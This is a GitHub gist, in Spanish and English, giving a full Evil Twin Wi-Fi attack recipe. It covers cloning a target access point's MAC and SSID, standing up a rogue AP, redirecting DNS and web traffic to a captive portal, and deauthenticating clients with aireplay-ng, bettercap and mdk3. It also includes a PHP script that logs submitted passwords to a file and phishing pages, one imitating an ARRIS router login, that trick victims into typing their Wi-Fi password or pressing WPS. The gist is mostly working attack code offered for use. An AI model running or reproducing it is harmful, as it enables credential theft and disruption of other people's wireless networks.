Skip to content

Instantly share code, notes, and snippets.

@vitouXY
Created March 8, 2021 17:44
Show Gist options
  • Save vitouXY/4f9da5a0713f02153823d7a6e72f5325 to your computer and use it in GitHub Desktop.
Save vitouXY/4f9da5a0713f02153823d7a6e72f5325 to your computer and use it in GitHub Desktop.
Evil Twin | WPS-PBC

Evil Twin / WPS-PBC

Interfaces

find /sys/class/net/ -type l -print | grep -v "/lo$"

Variables

IFACE=wlan0
IFACEM=${IFACE:?}mon

IFACE_MODE="$(iw dev ${IFACE:?} info | awk '/type/ {print $2}')"
IFACE_PHY="$(iw dev ${IFACE:?} info | awk '/wiphy/ {print "phy"$2}')"
IFACE_TX="$(iw dev ${IFACE:?} info | awk '/txpower/ {print $2}')"
IFACE_MAC="$(iw dev ${IFACE:?} info | awk '/addr/ {print $2}')"

TARGET_ESSID='Home WaiFai'
TARGET_BSSID='A1:B2:C3:D4:E5:F6'
TARGET_CHANNEL='5'
TARGET_CLIENT='A1:B2:C3:D4:E5:F6'
IFACE_IPADDR='192.168.0'

Interface Modo Monitor

rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw reg set US # BO
##iw ${IFACE:?} set txpower fixed 3000
##iwconfig ${IFACE:?} txpower 30
#iw ${IFACE:?} set monitor control
#airmon-ng check
#airmon-ng check kill
#airmon-ng start ${IFACE:?}
iw phy ${IFACE_PHY:?} interface add ${IFACE:?}mon type monitor
ip link set dev ${IFACE:?} up

Interface Modo Managed

rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw reg set US # BO
iwconfig ${IFACE:?} mode managed
#iwconfig ${IFACE:?} mode ad-hoc
#iwconfig ${IFACE:?} channel 3
#iw set ${IFACE:?} type monitor #?
ip link set dev ${IFACE:?} up

Eliminar Interface

rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw dev ${IFACE:?} del

Escanear/Buscar Redes

  • Option 1
bettercap -iface ${IFACEM:?} -eval 'wifi.recon on;wifi.region US;wifi.txpower 30;set wifi.show.limit 13;set wifi.rssi.min -70;set wifi.show.sort rssi asc;set wifi.show.manufacturer true;set ticker.period 1;set ticker.commands "clear;wifi.show";ticker on')
 # -eval 'wifi.recon on;wifi.show')
 ## rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd # desc|asc
 # wifi.interface ${IFACEM:?}
 # set wifi.show.filter ^XX:XX
  • Option 2
airodump-ng --encrypt WPA ${IFACEM:?}

Montar AP

ip link set dev ${IFACE:?} down
macchanger --mac=${TARGET_BSSID:?} ${IFACE:?}
#macchanger -r ${IFACE:?}
ip link set dev ${IFACE:?} up
# http://standards-oui.ieee.org/oui.txt# /usr/share/nmap/nmap-mac-prefixescat oui.txt | grep -i "$(printf "${TARGET_BSSID:?}" | tr -d ':' | head -c 6)" | cut -d')' -f2 | tr -d '\t'
  • Option 1
airbase-ng -e "${TARGET_ESSID:?}" -c ${TARGET_CHANNEL:?} ${IFACEM:?}
#airbase-ng -c ${TARGET_CHANNEL:?} -a "${TARGET_BSSID:?}" -e "${TARGET_ESSID:?}" -W 1 ${IFACEM:?}
#sleep 2
#airbase-ng -e "${TARGET_ESSID:?} " -c 1 -L -W 1 ${IFACEM:?} # Con el espacio
# -Z # 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • Option 2
nano hostapd.conf
 interface=${IFACE:?}
 channel=${TARGET_CHANNEL:?}
 hw_mode=g
 ssid=${TARGET_ESSID:?}
 #bridge=br0
 auth_algs=1
 wmm_enabled=0
hostapd -P hostapd.pid hostapd.conf
  • Option 3
bettercap -iface ${IFACEM:?} -eval "set wifi.ap.ssid '${TARGET_ESSID:?}';set wifi.ap.bssid ${TARGET_BSSIDX:?};set wifi.ap.channel ${TARGET_CHANNEL:?};set wifi.ap.encryption false;wifi.recon on; wifi.ap"

Asignar Direcciónes IP

ip link set dev ${IFACE:?} up
ip addr add ${IFACE_IPADDR:?}.1/24 broadcast ${IFACE_IPADDR:?}.255 dev ${IFACE:?}
#          iptables ||  iptables-legacy
# modinfo nf_tables || modinfo ip_tables
iptables --flush
iptables -t nat --flush
#iptables --table nat --append POSTROUTING --out-interface ${IFACE2:?} -j MASQUERADE
iptables --append FORWARD --in-interface ${IFACE:?} -j ACCEPT
iptables -t nat -A PREROUTING -i ${IFACE:?} -p udp -m udp --dport 53 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:53
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A PREROUTING -i ${IFACE:?} -p tcp -m tcp --dport 80 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A PREROUTING -i ${IFACE:?} -p tcp -m tcp --dport 443 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE
sysctl net.ipv4.ip_forward=1 || echo 1 > /proc/sys/net/ipv4/ip_forward
nano dnsmasq.conf
 interface=${IFACE:?}
 #listen-address=127.0.0.1
 listen-address=${IFACE_IPADDR:?}.1
 #port=0
 #bind-interfaces
 dhcp-range=${IFACE_IPADDR:?}.10,${IFACE_IPADDR:?}.250,5m
 dhcp-option=3,${IFACE_IPADDR:?}.1
 dhcp-option=6,${IFACE_IPADDR:?}.1
 server=8.8.8.8
 log-queries
 log-dhcp
 no-hosts
 dhcp-option=option:router,${IFACE_IPADDR:?}.1
 dhcp-authoritative
 address=/gstatic.com/${IFACE_IPADDR:?}.1
 address=/connectivitycheck.android.com/${IFACE_IPADDR:?}.1
dnsmasq -C dnsmasq.conf --log-facility=- -x dnsmasq.pid -l dnsmasq.leases -d # -k
#dnsspoof -i ${IFACE:?}

Servir Sitio Web

mkdir www.html
nano www.html/loading.html
Loading, please wait ...
nano www.html/post.php
<?php
header ("Location:/loading.html");
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
 fwrite($handle, $variable);
 fwrite($handle, "=");
 fwrite($handle, $value);
 fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
nano www.html/index.html
<!DOCTYPE html>
<html>
 <head>
  <title>Sign www.html/index.htmlin</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width,
  initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
 </head>
 <body>
  <p> Pulse el boton WPS en su Router o ingrese contrasena.</p>
  <form method="post" action="post.php">
   <!-- <input type="text" name="email" placeholder="Email" required> -->
   <input type="password" name="password" placeholder="Password" required>
   <button type="submit" name="submit">Sign in</button>
  </form>
 </body>
</html>
touch www.html/usernames.txt
php -S ${IFACE_IPADDR:?}.1:80 -t www.html/
tail -f www.html/usernames.txt

DesAutenticar Clientes

  • Option 1
aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} ${IFACEM:?}
#aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} -c ${TARGET_CLIENT:?} ${IFACEM:?}
  • Option 2
bettercap -iface ${IFACEM:?} -eval "wifi.deauth ${TARGET_BSSID:?}"
#bettercap -iface ${IFACEM:?} -eval "set ticker.period 3;set ticker.commands 'wifi.deauth ${TARGET_BSSID:?}';ticker on"
  • Option 3
mdk3 ${IFACEM:?} -d -g -t ${TARGET_BSSID:?} -c ${TARGET_CHANNEL:?}

WPA-PBC - WPA_Supplicat

killall dhclient dhcpcd
nano wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
 ctrl_interface_group=root
 update_config=1
wpa_supplicant -c wpa_supplicant.conf -i ${IFACE:?}

WPS-PBC - Wait for

wpa_cli -i ${IFACE:?} wps_pbc any # ~120sec
cat wpa_supplicant.conf

# https://github.com/bettercap/bettercap/releases/
export LD_LIBRARY_PATH=${LD_LIBRARY_PATH:-}:/usr/local/lib:${pwd}/bettercaplib


lsusb -v | grep 'id'
# idVendor           0x148f Ralink Technology, Corp.
# idProduct          0x3070 RT2870/RT3070 Wireless Adapte
modinfo rt2800usb | grep -E "filename|firmware"
ls -l /lib/firmware/rt2870.bin
# https://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git
# https://github.com/NXP/linux-firmware
curl -L  https://github.com/NXP/linux-firmware/raw/master/rt2870.bin -o rt2870.bin
mv rt2870.bin /lib/firmware


nano index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Login</title>

    <meta charset='UTF-8'>
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="pragma" content="no-cache" />

    <meta name="google" value="notranslate">
    <script language="Javascript"> var TimeID; function timer() { window.clipboardData.clearData(); timeID = setTimeout('timer()', 100); } </script>
    <style type="text/css">
	TABLE { width:1200px }
	a { font-size:18px; text-decoration:none; font-weight:bold; }
	#bg-ffcolor { background-color:#FFFFFF; }
	#bg-tcolor { background-color:#FBFCFC; }
	#bg-color { background-color:#FDFFFF; }
	/**/
	#bg-bcolor { background-color:#9E1B32; }
	#bg-fcolor { background-color:#191970; }
	#ft-fcolor { color:#191970; }
    </style>
</head>
<body onload="timer()" oncontextmenu="return false" ondragstart="return false" onselectstart="return false">

<TABLE id="bg-color" style="height:800px;position:absolute;top:0;bottom:0;left:0;right:0;">
<TR id="bg-bcolor" style="height:20px"><TD></TD></TR>
<TR id="bg-fcolor" style="height:10px"><TD></TD></TR>
<TR id="bg-ffcolor"  style="height:100px">
	<TD>
	<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100px">
	<TR VALIGN=bottom>
	<TD VALIGN=MIDDLE ALIGN=CENTER style="height:100px;height:50%"><img style="height:95px" src="/static.png" alt="LOGO"/></TD>
	<TD style="height:100px;width:600px"></TD>
		<TD>
		<TABLE style="height:100%;width:300px;">
		<TR></TR>
		<TR></TR>
		<TR></TR>
		<TR>
	<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="width:100px;"><a style="color:#FFFFFF;" href="/index.html">Home</a></TD>
	<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="whidth:100px;"><a style="color:#FFFFFF;" href="/">Login</a></TD>
	<TD style="width:100px;"></TD>
		</TR>
		</TABLE>
		</TD>
	</TR>
	</TABLE>
	</TD>
</TR>
<TR>
	<TD>
	<TABLE style="height:100%;width:100%">
	<TR style="width:100%;">
	<TD id="bg-ffcolor" style="width:15%;">
		<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100%;width:100%;">
		<TR style="height:8%;"><TD></TD></TR>
		<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/setup.html">Wireless Setup</a></TD></TR>
		<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/utils.html">Utilities</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/restart.html">Restart Router</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/wipe.html">Restore Factory</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Default">Default</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Save">Save/Backup Settings</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Restore">Restore Previus</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html">Settings</a></TD></TR>
		<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html#Sys">System Settings</a></TD></TR>
		<TR><TD></TD></TR>
		</TABLE>
	</TD>
	<TD ALIGN=CENTER VALIGN=top id="ft-fcolor" style="width:10%;font-weight:900;font-size:28px;">Login</TD>
	<TD style="width:75%;">
		<TABLE style="height:100%;width:100%">
		<TR style="height:10%;"><TD></TD></TR>
		<TR>
		<TD COLSPAN=3 VALIGN=top id="bg-tcolor" style="height:20%;width:80%;">
<p style="font-weight:900;font-family:'Courier New'">To start or continue configuring the Router Modem, log in with a password. If you have not set up a password, leave this field blank and click 'Submit'.</p>
<p>   ** Password is required!</p>
		</TD>
		<TD></TD>
		</TR>
		<form method="post" action="post.php">
		<TR style="height:10%;">
		<TD ALIGN=CENTER style="width:40%"><strong>Password</strong></TD>
		<TD ALIGN=LEFT><input type="password" name="password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required></TD>
		</TR>
		<TR VALIGN=top>
		<TD ALIGN=RIGHT><button type="submit" name="submit">Submit</button></TD>
		</TR>
		</TABLE>
	</TD>
	</TR>
	</TABLE>
<center><p style="font-size:11px;">Firmware TS0705125C_012814 eSAFE 0 FW Revision 2.0.69_063C</p></center>
<center><p style="font-size:11px;">©2014 ARRIS Group. Inc. ALL RIGHTS RESERVED.</p></center>
<!--
<center><p style="font-size:11px;">Copyright © Huawei Technologies Co. Ltd. 2009-2014. All Rights Reserved.</p></center>
-->
	</TD>
</TR>
</TABLE>



</body>
</html>
nano backup.html settings.html utils.html restart.html setup.html wipe.html
<!DOCTYPE html>
<html>
<head><meta http-equiv="refresh" content="1; url=/index.html"></head>
<body><p>TSK637::Pending Task.<p>
<p>AUTH:Failed - <a href="/index.html">Redirection</a></p></body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment